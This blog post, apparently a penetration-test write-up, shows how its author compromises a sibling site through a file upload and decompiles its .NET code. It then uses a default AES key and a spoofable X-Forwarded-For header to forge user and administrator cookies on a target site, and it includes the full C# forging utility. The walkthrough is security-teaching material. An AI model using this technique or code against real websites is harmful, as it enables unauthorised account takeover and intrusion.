让渗透从黑盒变为“灰盒”

最新推荐文章于 2024-10-09 17:10:24 发布
最新推荐文章于 2024-10-09 17:10:24 发布
阅读量51 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27278819/article/details/133281902
版权

关注微信公众号获取更多资讯,第一时间学习最新前沿渗透技术!
在这里插入图片描述

0x01 前言

在进行渗透测试时,经常会遇到一些比较讨厌的问题。例如:没有账号、注册的账号功能有限、不知道后台在哪等等。下面会讲述一种解决思路
网站的底部通常会有备案、主办单位、承办单位、技术支持等信息。通过“技术支持”这样的关键字可以在搜索引擎中找到与目标应用相同的网站,对这些网站进行的简单的渗透。利用从这些网站上获取的漏洞信息,再去攻击目标网站,往往可以获取很大的收益。

0x02 案例

在目标网站下方发现“技术支持”关键字
image.png

利用FOFA搜索关键字,发现相同的系统应用,下文统称为A网站
image.png

对A网站进行渗透测试发现存在一处任意文件上传,很简单的就获取了一个WebShell
注:原来目标网站也有任意文件只不过修复了
image.png

在WEB目录下存在Log文件夹且命名方式可以爆破
image.png

把这个漏洞信息利用到目标网站去,访问/Log/2020/返回403,说明目录存在
image.png

但是利用发现的命名规则以及常见的命名规则进行爆破,并没有成功。可惜了…
image.png

跳过这个日志这个点继续渗透,发现用户的登录凭证很有特征,像是AES或者DES加密
image.png
既然是AES或者DES加密那么密钥肯定在配置文件中或者源码中,于是把A网站的源码打包下载。由于是.Net的网站所以还要用ILSpy反编译dll文件查看源码
image.png

定位到登录口,发现了加密算法为AES
image.png

跟进AES.Encode函数,发现其密钥获取方式:“xxxxx”+IP
image.png

Utils.GetClientIP()获取的是XFF头,所以也是可控的
image.png

然后我就写了一个Decode进行一个验证

using System;
using System.Data;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
using System.Security.Cryptography;
using System.IO;
using System.Text;

public class AES
{
	public static byte[] Keys = new byte[16]
	{
		65,
		114,
		101,
		121,
		111,
		117,
		109,
		121,
		83,
		110,
		111,
		119,
		109,
		97,
		110,
		63
	};
	
	public static string GetSubString(string p_SrcString, int p_StartIndex, int p_Length, string p_TailString)
	{
		string result = p_SrcString;
		byte[] bytes = Encoding.UTF8.GetBytes(p_SrcString);
		char[] chars = Encoding.UTF8.GetChars(bytes);
		foreach (char c in chars)
		{
			if ((c > 'ࠀ' && c < '一') || (c > '가' && c < '힣'))
			{
				if (p_StartIndex >= p_SrcString.Length)
				{
					return "";
				}
				return p_SrcString.Substring(p_StartIndex, (p_Length + p_StartIndex > p_SrcString.Length) ? (p_SrcString.Length - p_StartIndex) : p_Length);
			}
		}
		if (p_Length >= 0)
		{
			byte[] bytes2 = Encoding.Default.GetBytes(p_SrcString);
			if (bytes2.Length > p_StartIndex)
			{
				int num = bytes2.Length;
				if (bytes2.Length > p_StartIndex + p_Length)
				{
					num = p_Length + p_StartIndex;
				}
				else
				{
					p_Length = bytes2.Length - p_StartIndex;
					p_TailString = "";
				}
				int num2 = p_Length;
				int[] array = new int[p_Length];
				byte[] array2 = null;
				int num3 = 0;
				for (int j = p_StartIndex; j < num; j++)
				{
					if (bytes2[j] > 127)
					{
						num3++;
						if (num3 == 3)
						{
							num3 = 1;
						}
					}
					else
					{
						num3 = 0;
					}
					array[j] = num3;
				}
				if (bytes2[num - 1] > 127 && array[p_Length - 1] == 1)
				{
					num2 = p_Length + 1;
				}
				array2 = new byte[num2];
				Array.Copy(bytes2, p_StartIndex, array2, 0, num2);
				result = Encoding.Default.GetString(array2);
				result += p_TailString;
			}
		}
		return result;
	}

	public static string Encode(string encryptString, string encryptKey)
	{
		encryptKey = GetSubString(encryptKey, 0, 32, "");
		encryptKey = encryptKey.PadRight(32, ' ');
		RijndaelManaged rijndaelManaged = new RijndaelManaged();
		rijndaelManaged.Key = Encoding.UTF8.GetBytes(encryptKey.Substring(0, 32));
		rijndaelManaged.IV = Keys;
		ICryptoTransform cryptoTransform = rijndaelManaged.CreateEncryptor();
		byte[] bytes = Encoding.UTF8.GetBytes(encryptString);
		byte[] inArray = cryptoTransform.TransformFinalBlock(bytes, 0, bytes.Length);
		return Convert.ToBase64String(inArray);
	}

	public static string Decode(string decryptString, string decryptKey)
	{
		try
		{
			decryptKey = GetSubString(decryptKey,0, 32, "");
			decryptKey = decryptKey.PadRight(32, ' ');
			RijndaelManaged rijndaelManaged = new RijndaelManaged();
			rijndaelManaged.Key = Encoding.UTF8.GetBytes(decryptKey);
			rijndaelManaged.IV = Keys;
			ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor();
			byte[] array = Convert.FromBase64String(decryptString);
			byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
			return Encoding.UTF8.GetString(bytes);
		}
		catch
		{
			return "";
		}
	}

	public static string Encode(string encryptString)
	{
  		// 密钥
		return Encode(encryptString, "xxxxxx" + "127.0.0.1");
	}

	public static string Decode(string decryptString)
	{
        // 密钥
		return Decode(decryptString, "xxxxxx" + "127.0.0.1");
	}
	
	public static void Main(string[] args){
        // 解密用户凭证
		System.Console.WriteLine(Decode("xxxxx"));
	}
}

验证步骤如下:

  1. 修改XFF头为127.0.0.1

image.png

  1. 随便注册个账号,登录目标网站,获取凭证

image.png

  1. 用Decode解密用户凭证

image.png
最终成功解密了,这说明目标网站用的也是默认的加密密钥,所以存在用户凭证伪造(任意用户登陆)

伪造普通用户危害总是有限的。所以继续查看代码,发现管理员凭证使用也是同一种加密方式
image.png

修改Cookie为Weiyum访问目标网站后台,结果返回没有权限
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

进入Admin的基类查看,原来是根据用户的ID做了权限检测
image.png

怎样获取管理的ID呢?通常一款后台应用初始肯定是有一个默认的管理用户的,那么他的ID应该不是随机的。通过之前获取A网站的WebShell查询数据库,得知默认的AdmidID为ba2fxxxxxxxxxxxxxxxxxxxxxxxxd49e21a

然后用伪造用户信息

{
	"Type": 0,
	"UserName": "71000019780612618X",
	"RealName": "邵霞",
	"Email": "test@qq.com",
	"Tel": "13888888888",
	"IDCard": "71000019780612618X",
	"Password": "ce1c1cdc2fac8e1167f22cd4bd88d324",
	"PasswordWay": "M",
	"Remark": "",
	"Avatar": "/Public/static/face/default_head_50.png",
	"Gender": 0,
	"Minority": "",
	"NativePlace": "",
	"Birth": "0001-01-01T00:00:00",
	"ID": "ba2fxxxxxxxxxxxxxxxxxxxxxxxxd49e21a",
	"CreateBy": "邵霞",
	"CreateOn": "2020-08-02T01:56:26",
	"UpdateBy": "",
	"UpdateOn": null,
	"Status": 1,
	"IsAdd": false
}

利用Encode生成加密后的用户凭证

public static void Main(string[] args){
	System.Console.WriteLine(Encode("xxxx"));
}

image.png

重新修改Weiyum,成功伪造管理员身份
image.png

0x03 总结

  1. 利用网站的技术支持信息去搜寻相同的应用,然后对其进行渗透,尝试获取有用的漏洞信息
  2. 通常可以尝试获取默认的密码规则,默认的日志、备份规则、默认的加密密钥
  3. 如果有条件可以下载源码,对其进行代码审计
渗透的艺术
关注
黑盒渗透测试简介2
malihexiaoxiao的博客
03-24 245
渗透测试攻击
白盒渗透测试简介
malihexiaoxiao的博客
03-27 788
白盒渗透测试简介
Kali Linux渗透
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-28 7713
本文是关于Kali Linux渗透的基本内容
软件测试做了五年黑盒测试,我总结的这些经验
测试人,要卷就卷成最强的!
10-21 771
黑盒测试:是在已知产品所具有的功能的前提下,通过测试来检测每个功能是否能够正常使用。在测试时,把程序看作一个不能打开的黑盒子。在完全不考虑程序的内部结构和内部特性的情况下,在程序接口进行测试,只检查程序功能是否按照需求规格说明书的规定正常工作、程序是否能适当地接受输入数据而产生正确的输出信息,并保持外部信息(如数据库文件)的完整性。
小迪渗透测试
A_MU1的博客
07-14 2669
去打打
带你认识Linux安全渗透,秒懂的那种
HBohan的博客
06-24 1121
什么是安全渗透 渗透测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是,渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。 渗透测试与其他评估方法不同。通常的评估方法是根据已知信息资源或其他被评估对象,去发现所有相关的安全问题。渗透测试是根据已知可利用的安全漏洞,去发现是否存在相应的信息资源。相比较而言,通常评估方法对评估结果更具
测试渗透前置知识-行业术语
TianYao
02-10 7579
测试渗透前置知识-行业术语1.肉鸡3.远控4.黑页5.挂马6.大马7.小马8.一句话后门9.后门10.拖库11.社工库12.撞库13.提权14.网络钓鱼15.社会工程学攻击16.rootkit17.IPC$18.弱口令19.默认共享20.shell21.交互式shell22.webshell23.溢出24.注入25.注入点26.旁站入侵27.C段渗透28.内网:29.外网30.中间人攻击31.端口32.免杀33.加壳34.花指令35.TCP/IP36.蜜罐37.拒绝服务攻击38.CC攻击39.脚本注入攻击(
渗透测试工具Burp Suite详解
热门推荐
_Co1a
12-15 8万+
Burp Suite 的安装 Burp Suite是一款集成化的渗透测试工具,包含了很多功能,可以帮助我们高效地完成对Web应用程序的渗透测试和攻击。 Burp Suite由Java语言编写,基于Java自身的跨平台性,使这款软件学习和使用起来更方便。Burp Suite不像其他自动化测试工具,它需要手工配置一些参数,触发一些自动化流程,然后才会开始工作。 Burp Suite可执行程序是Java文件类型的jar文件,免费版可以从官网下载。免费版的Burp Suite会有许多限制,无法使用很多高
HACKINOS虚拟机渗透测试
m0_65968201的博客
11-12 691
hackinos渗透过程
计算机病毒与防护:网络渗透测试.ppt
06-10
渗透人员 思维方式 经验 解决了“安全玻璃天花板”问题 防御由被动变为主动 能在漏洞暴露之前被修复 渗透测试基础 渗透测试分类 黑盒测试 白盒测试 灰盒测试 对系统一无所知 模仿外部黑客渗透 了解拓扑、员工、代码...
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2065
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
Web安全 - 路径穿越(Path Traversal)
小工匠
10-02 2551
路径穿越(Path Traversal)是一种Web应用漏洞,攻击者通过操控输入文件路径参数,以访问系统上未经授权的文件。通过路径穿越,攻击者可以使用诸如../的相对路径绕过访问限制,读取系统敏感信息或修改配置文件。
网络安全(黑客)——自学2024
2401_84466325的博客
09-28 2977
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】Cookie与ID未强绑定导致账户接管
等风来
10-02 377
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
网络安全的详细学习顺序
2401_87352036的博客
10-02 1555
网络安全的详细学习顺序可以按照由浅入深、逐步递进的原则进行。
网络安全(黑客)自学
白帽子凯哥聊黑客
10-09 1857
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
web安全】——文件包含漏洞
wxh的博客
10-03 1313
什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。
网络安全社区和论坛
最新发布
久绊A的博客
10-09 253
FreeBuf先知社区看雪论坛安全客Hack ForumsNull ByteDark ReadingOWASP(Open Web Application Security Project)
白盒测试和黑盒灰盒测试
06-18
灰盒测试则介于两者之间,它结合了白盒和黑盒测试的特点。灰盒测试者部分了解系统内部结构,但并不完全掌握,他们关注输入与预期输出之间的关系,同时也会检查一些关键的内部逻辑,以便更全面地评估系统的功能和性能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值